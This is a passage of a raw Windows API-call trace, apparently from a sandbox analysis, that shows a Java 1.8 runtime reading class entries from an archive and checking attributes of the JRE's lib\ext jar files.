lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208e100*=0x5c9, lpOverlapped=0x0) returned 1 [0103.173] free (_Block=0x12221ea0) [0103.173] free (_Block=0x1228e870) [0103.208] strlen (_Str="sun/net/util/URLUtil.class") returned 0x1a [0103.208] malloc (_Size=0x48) returned 0x1228eb40 [0103.208] malloc (_Size=0xa0) returned 0x122965e0 [0103.209] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418bc2, lpNewFilePointer=0x208d3e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d3e0*=54627266) returned 1 [0103.209] ReadFile (in: hFile=0x134, lpBuffer=0x122965e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d3b0, lpOverlapped=0x0 | out: lpBuffer=0x122965e0*, lpNumberOfBytesRead=0x208d3b0*=0xa0, lpOverlapped=0x0) returned 1 [0103.210] malloc (_Size=0x1b) returned 0x12221ae0 [0103.211] strlen (_Str="sun/net/util/URLUtil.class") returned 0x1a [0103.211] strcpy (in: _Dest=0x208d560, _Source="sun/net/util/URLUtil.class" | out: _Dest="sun/net/util/URLUtil.class") returned="sun/net/util/URLUtil.class" [0103.211] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310eb1d, lpNewFilePointer=0x208cfe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cfe0*=51440413) returned 1 [0103.211] ReadFile (in: hFile=0x134, lpBuffer=0x208d030, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cfb0, lpOverlapped=0x0 | out: lpBuffer=0x208d030*, lpNumberOfBytesRead=0x208cfb0*=0x1e, lpOverlapped=0x0) returned 1 [0103.213] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310eb55, lpNewFilePointer=0x208d040, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d040*=51440469) returned 1 [0103.220] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x677, lpNumberOfBytesRead=0x208d010, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208d010*=0x677, lpOverlapped=0x0) returned 1 [0103.220] free (_Block=0x121d7af0) [0103.221] free (_Block=0x1228eaf0) [0103.230] strlen (_Str="sun/misc/URLClassPath$3.class") returned 0x1d [0103.230] malloc (_Size=0x48) returned 0x1228e870 [0103.230] malloc (_Size=0xa0) returned 0x122965e0 [0103.230] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418b77, lpNewFilePointer=0x208d630, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d630*=54627191) returned 1 [0103.230] ReadFile (in: hFile=0x134, lpBuffer=0x122965e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d600, lpOverlapped=0x0 | out: lpBuffer=0x122965e0*, lpNumberOfBytesRead=0x208d600*=0xa0, lpOverlapped=0x0) returned 1 [0103.231] malloc (_Size=0x1e) returned 0x12221ea0 [0103.232] strlen (_Str="sun/misc/URLClassPath$3.class") returned 0x1d [0103.232] strcpy (in: _Dest=0x208d7b0, _Source="sun/misc/URLClassPath$3.class" | out: _Dest="sun/misc/URLClassPath$3.class") returned="sun/misc/URLClassPath$3.class" [0103.232] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310e45c, lpNewFilePointer=0x208d230, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d230*=51438684) returned 1 [0103.232] ReadFile (in: hFile=0x134, lpBuffer=0x208d280, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d200, lpOverlapped=0x0 | out: lpBuffer=0x208d280*, lpNumberOfBytesRead=0x208d200*=0x1e, lpOverlapped=0x0) returned 1 [0103.233] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310e497, lpNewFilePointer=0x208d290, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d290*=51438743) returned 1 [0103.233] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x686, lpNumberOfBytesRead=0x208d260, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208d260*=0x686, lpOverlapped=0x0) returned 1 [0103.234] free (_Block=0x12221ae0) [0103.234] free (_Block=0x1228eb40) [0103.264] strlen (_Str="sun/misc/URLClassPath$JarLoader.class") returned 0x25 [0103.264] malloc (_Size=0x48) returned 0x1228e5a0 [0103.264] malloc (_Size=0xa0) returned 0x122965e0 [0103.264] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418b24, lpNewFilePointer=0x208c9c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9c0*=54627108) returned 1 [0103.264] ReadFile (in: hFile=0x134, lpBuffer=0x122965e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c990, lpOverlapped=0x0 | out: lpBuffer=0x122965e0*, lpNumberOfBytesRead=0x208c990*=0xa0, lpOverlapped=0x0) returned 1 [0103.265] malloc (_Size=0x26) returned 0x12221ae0 [0103.266] strlen (_Str="sun/misc/URLClassPath$JarLoader.class") returned 0x25 [0103.266] strcpy (in: _Dest=0x208cb40, _Source="sun/misc/URLClassPath$JarLoader.class" | out: _Dest="sun/misc/URLClassPath$JarLoader.class") returned="sun/misc/URLClassPath$JarLoader.class" [0103.266] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310be00, lpNewFilePointer=0x208c5c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c5c0*=51428864) returned 1 [0103.266] ReadFile (in: hFile=0x134, lpBuffer=0x208c610, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c590, lpOverlapped=0x0 | out: lpBuffer=0x208c610*, lpNumberOfBytesRead=0x208c590*=0x1e, lpOverlapped=0x0) returned 1 [0103.267] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310be43, lpNewFilePointer=0x208c620, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c620*=51428931) returned 1 [0103.267] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x2619, lpNumberOfBytesRead=0x208c5f0, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208c5f0*=0x2619, lpOverlapped=0x0) returned 1 [0103.270] free (_Block=0x12221ea0) [0103.270] free (_Block=0x1228e870) [0103.278] malloc (_Size=0x48) returned 0x1228eb90 [0103.278] malloc (_Size=0xa0) returned 0x122965e0 [0103.278] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418ad4, lpNewFilePointer=0x208bf80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf80*=54627028) returned 1 [0103.278] ReadFile (in: hFile=0x134, lpBuffer=0x122965e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bf50, lpOverlapped=0x0 | out: lpBuffer=0x122965e0*, lpNumberOfBytesRead=0x208bf50*=0xa0, lpOverlapped=0x0) returned 1 [0103.279] malloc (_Size=0x23) returned 0x12221ea0 [0103.279] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310b49b, lpNewFilePointer=0x208bb80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb80*=51426459) returned 1 [0103.279] ReadFile (in: hFile=0x134, lpBuffer=0x208bbd0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bb50, lpOverlapped=0x0 | out: lpBuffer=0x208bbd0*, lpNumberOfBytesRead=0x208bb50*=0x1e, lpOverlapped=0x0) returned 1 [0103.280] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310b4db, lpNewFilePointer=0x208bbe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbe0*=51426523) returned 1 [0103.280] ReadFile (in: hFile=0x134, lpBuffer=0x1225e130, nNumberOfBytesToRead=0x925, lpNumberOfBytesRead=0x208bbb0, lpOverlapped=0x0 | out: lpBuffer=0x1225e130*, lpNumberOfBytesRead=0x208bbb0*=0x925, lpOverlapped=0x0) returned 1 [0103.286] malloc (_Size=0x48) returned 0x1228e960 [0103.286] malloc (_Size=0xa0) returned 0x122965e0 [0103.286] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33cb24c, lpNewFilePointer=0x208c5e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c5e0*=54309452) returned 1 [0103.286] ReadFile (in: hFile=0x134, lpBuffer=0x122965e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c5b0, lpOverlapped=0x0 | out: lpBuffer=0x122965e0*, lpNumberOfBytesRead=0x208c5b0*=0xa0, lpOverlapped=0x0) returned 1 [0103.287] malloc (_Size=0x23) returned 0x12221ae0 [0103.287] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x25d87d9, lpNewFilePointer=0x208c1e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c1e0*=39684057) returned 1 [0103.288] ReadFile (in: hFile=0x134, lpBuffer=0x208c230, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c1b0, lpOverlapped=0x0 | out: lpBuffer=0x208c230*, lpNumberOfBytesRead=0x208c1b0*=0x1e, lpOverlapped=0x0) returned 1 [0103.300] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x25d8819, lpNewFilePointer=0x208c240, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c240*=39684121) returned 1 [0103.301] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x3f8, lpNumberOfBytesRead=0x208c210, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208c210*=0x3f8, lpOverlapped=0x0) returned 1 [0103.302] malloc (_Size=0x48) returned 0x1228e410 [0103.302] malloc (_Size=0xa0) returned 0x122965e0 [0103.302] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33cb152, lpNewFilePointer=0x208bf60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf60*=54309202) returned 1 [0103.302] ReadFile (in: hFile=0x134, lpBuffer=0x122965e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bf30, lpOverlapped=0x0 | out: lpBuffer=0x122965e0*, lpNumberOfBytesRead=0x208bf30*=0xa0, lpOverlapped=0x0) returned 1 [0103.302] malloc (_Size=0x25) returned 0x12221ea0 [0103.302] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x25d7a5e, lpNewFilePointer=0x208bb60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb60*=39680606) returned 1 [0103.302] ReadFile (in: hFile=0x134, lpBuffer=0x208bbb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bb30, lpOverlapped=0x0 | out: lpBuffer=0x208bbb0*, lpNumberOfBytesRead=0x208bb30*=0x1e, lpOverlapped=0x0) returned 1 [0103.307] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x25d7aa0, lpNewFilePointer=0x208bbc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbc0*=39680672) returned 1 [0103.307] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x46c, lpNumberOfBytesRead=0x208bb90, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208bb90*=0x46c, lpOverlapped=0x0) returned 1 [0103.308] malloc (_Size=0x48) returned 0x1228e280 [0103.308] malloc (_Size=0xa0) returned 0x122965e0 [0103.308] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33cb1f6, lpNewFilePointer=0x208b520, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b520*=54309366) returned 1 [0103.308] ReadFile (in: hFile=0x134, lpBuffer=0x122965e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b4f0, lpOverlapped=0x0 | out: lpBuffer=0x122965e0*, lpNumberOfBytesRead=0x208b4f0*=0xa0, lpOverlapped=0x0) returned 1 [0103.308] malloc (_Size=0x29) returned 0x12298b40 [0103.308] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x25d83ba, lpNewFilePointer=0x208b120, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b120*=39683002) returned 1 [0103.309] ReadFile (in: hFile=0x134, lpBuffer=0x208b170, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b0f0, lpOverlapped=0x0 | out: lpBuffer=0x208b170*, lpNumberOfBytesRead=0x208b0f0*=0x1e, lpOverlapped=0x0) returned 1 [0103.309] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x25d8400, lpNewFilePointer=0x208b180, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b180*=39683072) returned 1 [0103.309] ReadFile (in: hFile=0x134, lpBuffer=0x1225bfa0, nNumberOfBytesToRead=0x3d9, lpNumberOfBytesRead=0x208b150, lpOverlapped=0x0 | out: lpBuffer=0x1225bfa0*, lpNumberOfBytesRead=0x208b150*=0x3d9, lpOverlapped=0x0) returned 1 [0103.311] strlen (_Str="sun/nio/cs/ThreadLocalCoders$2.class") returned 0x24 [0103.311] malloc (_Size=0x48) returned 0x1228e690 [0103.311] malloc (_Size=0xa0) returned 0x122965e0 [0103.311] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33cb1a4, lpNewFilePointer=0x208bf60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf60*=54309284) returned 1 [0103.311] ReadFile (in: hFile=0x134, lpBuffer=0x122965e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bf30, lpOverlapped=0x0 | out: lpBuffer=0x122965e0*, lpNumberOfBytesRead=0x208bf30*=0xa0, lpOverlapped=0x0) returned 1 [0103.311] malloc (_Size=0x25) returned 0x12221ea0 [0103.312] strlen (_Str="sun/nio/cs/ThreadLocalCoders$2.class") returned 0x24 [0103.312] strcpy (in: _Dest=0x208c0e0, _Source="sun/nio/cs/ThreadLocalCoders$2.class" | out: _Dest="sun/nio/cs/ThreadLocalCoders$2.class") returned="sun/nio/cs/ThreadLocalCoders$2.class" [0103.312] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x25d7f0c, lpNewFilePointer=0x208bb60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb60*=39681804) returned 1 [0103.312] ReadFile (in: hFile=0x134, lpBuffer=0x208bbb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bb30, lpOverlapped=0x0 | out: lpBuffer=0x208bbb0*, lpNumberOfBytesRead=0x208bb30*=0x1e, lpOverlapped=0x0) returned 1 [0103.312] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x25d7f4e, lpNewFilePointer=0x208bbc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbc0*=39681870) returned 1 [0103.312] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x46c, lpNumberOfBytesRead=0x208bb90, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208bb90*=0x46c, lpOverlapped=0x0) returned 1 [0103.313] free (_Block=0x12298b40) [0103.314] free (_Block=0x1228e280) [0103.341] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar") returned 0x3f [0103.341] malloc (_Size=0x8a) returned 0x12296670 [0103.341] wcscpy (in: _Dest=0x12296670, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar" [0103.341] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar", nBufferLength=0x9, lpBuffer=0x208d898, lpFilePart=0x208d890 | out: lpBuffer="", lpFilePart=0x208d890*=0x0) returned 0x40 [0103.342] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\access-bridge-64.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d630 | out: lpFileInformation=0x208d630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb397047, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb397047, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb397047, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x30134)) returned 1 [0103.343] free (_Block=0x12296670) [0103.374] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\cldrdata.jar") returned 0x37 [0103.374] malloc (_Size=0x7a) returned 0x122965e0 [0103.374] wcscpy (in: _Dest=0x122965e0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\cldrdata.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\cldrdata.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\cldrdata.jar" [0103.374] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\cldrdata.jar", nBufferLength=0x9, lpBuffer=0x208d898, lpFilePart=0x208d890 | out: lpBuffer="", lpFilePart=0x208d890*=0x0) returned 0x38 [0103.374] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\cldrdata.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d630 | out: lpFileInformation=0x208d630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb39aae1, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb39aae1, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3a33d2, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x3ae816)) returned 1 [0103.375] free (_Block=0x122965e0) [0103.377] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\dnsns.jar") returned 0x34 [0103.377] malloc (_Size=0x74) returned 0x122dce90 [0103.377] wcscpy (in: _Dest=0x122dce90, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\dnsns.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\dnsns.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\dnsns.jar" [0103.377] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\dnsns.jar", nBufferLength=0x9, lpBuffer=0x208d898, lpFilePart=0x208d890 | out: lpBuffer="", lpFilePart=0x208d890*=0x0) returned 0x35 [0103.377] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\dnsns.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d630 | out: lpFileInformation=0x208d630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3a4834, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3a4834, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3a4834, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x205e)) returned 1 [0103.378] free (_Block=0x122dce90) [0103.384] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jaccess.jar") returned 0x36 [0103.384] malloc (_Size=0x78) returned 0x122dc490 [0103.384] wcscpy (in: _Dest=0x122dc490, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jaccess.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jaccess.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jaccess.jar" [0103.385] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jaccess.jar", nBufferLength=0x9, lpBuffer=0x208d898, lpFilePart=0x208d890 | out: lpBuffer="", lpFilePart=0x208d890*=0x0) returned 0x37 [0103.385] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\jaccess.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d630 | out: lpFileInformation=0x208d630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3a4834, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3a4834, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3a4834, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xade4)) returned 1 [0103.385] free (_Block=0x122dc490) [0103.491] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jfxrt.jar") returned 0x34 [0103.491] malloc (_Size=0x74) returned 0x122dc210 [0103.491] wcscpy (in: _Dest=0x122dc210, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jfxrt.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jfxrt.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jfxrt.jar" [0103.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jfxrt.jar", nBufferLength=0x9, lpBuffer=0x208d898, lpFilePart=0x208d890 | out: lpBuffer="", lpFilePart=0x208d890*=0x0) returned 0x35 [0103.491] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\jfxrt.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d630 | out: lpFileInformation=0x208d630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3b45b0, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3b45b0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3e044f, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x11610cf)) returned 1 [0103.492] free (_Block=0x122dc210) [0103.492] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\localedata.jar") returned 0x39 [0103.492] malloc (_Size=0x7e) returned 0x122965e0 [0103.493] wcscpy (in: _Dest=0x122965e0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\localedata.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\localedata.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\localedata.jar" [0103.493] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\localedata.jar", nBufferLength=0x9, lpBuffer=0x208d898, lpFilePart=0x208d890 | out: lpBuffer="", lpFilePart=0x208d890*=0x0) returned 0x3a [0103.493] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\localedata.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d630 | out: lpFileInformation=0x208d630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed16d23d, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed16d23d, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed1ee857, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x21a293)) returned 1 [0103.493] free (_Block=0x122965e0) [0103.494] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\nashorn.jar") returned 0x36 [0103.494] malloc (_Size=0x78) returned 0x122dc190 [0103.494] wcscpy (in: _Dest=0x122dc190, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\nashorn.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\nashorn.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\nashorn.jar" [0103.494] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\nashorn.jar", nBufferLength=0x9, lpBuffer=0x208d898, lpFilePart=0x208d890 | out: lpBuffer="", lpFilePart=0x208d890*=0x0) returned 0x37 [0103.494] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\nashorn.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\nashorn.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d630 | out: lpFileInformation=0x208d630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3e5249, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3e5249, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3ea1c7, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1ee1cc)) returned 1 [0103.495] free (_Block=0x122dc190) [0103.495] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned 0x34 [0103.495] malloc (_Size=0x74) returned 0x122dc290 [0103.495] wcscpy (in: _Dest=0x122dc290, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar" [0103.495] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar", nBufferLength=0x9, lpBuffer=0x208d898, lpFilePart=0x208d890 | out: lpBuffer="", lpFilePart=0x208d890*=0x0) returned 0x35 [0103.495] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\sunec.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d630 | out: lpFileInformation=0x208d630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3ea1c7, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3ea1c7, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3ea1c7, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa2c8)) returned 1 [0103.496] free (_Block=0x122dc290) [0103.497] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned 0x3e [0103.497] malloc (_Size=0x88) returned 0x12296670 [0103.497] wcscpy (in: _Dest=0x12296670, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" [0103.497] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar", nBufferLength=0x9, lpBuffer=0x208d898, lpFilePart=0x208d890 | out: lpBuffer="", lpFilePart=0x208d890*=0x0) returned 0x3f [0103.497] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d630 | out: lpFileInformation=0x208d630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3ec780, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3ec780, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3edb58, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x43d4a)) returned 1 [0103.497] free (_Block=0x12296670) [0103.498] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunmscapi.jar") returned 0x38 [0103.498] malloc (_Size=0x7c) returned 0x122965e0 [0103.498] wcscpy (in: _Dest=0x122965e0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunmscapi.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunmscapi.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunmscapi.jar" [0103.498] GetFullPathNameW (in: lpFileName="C:\\Program 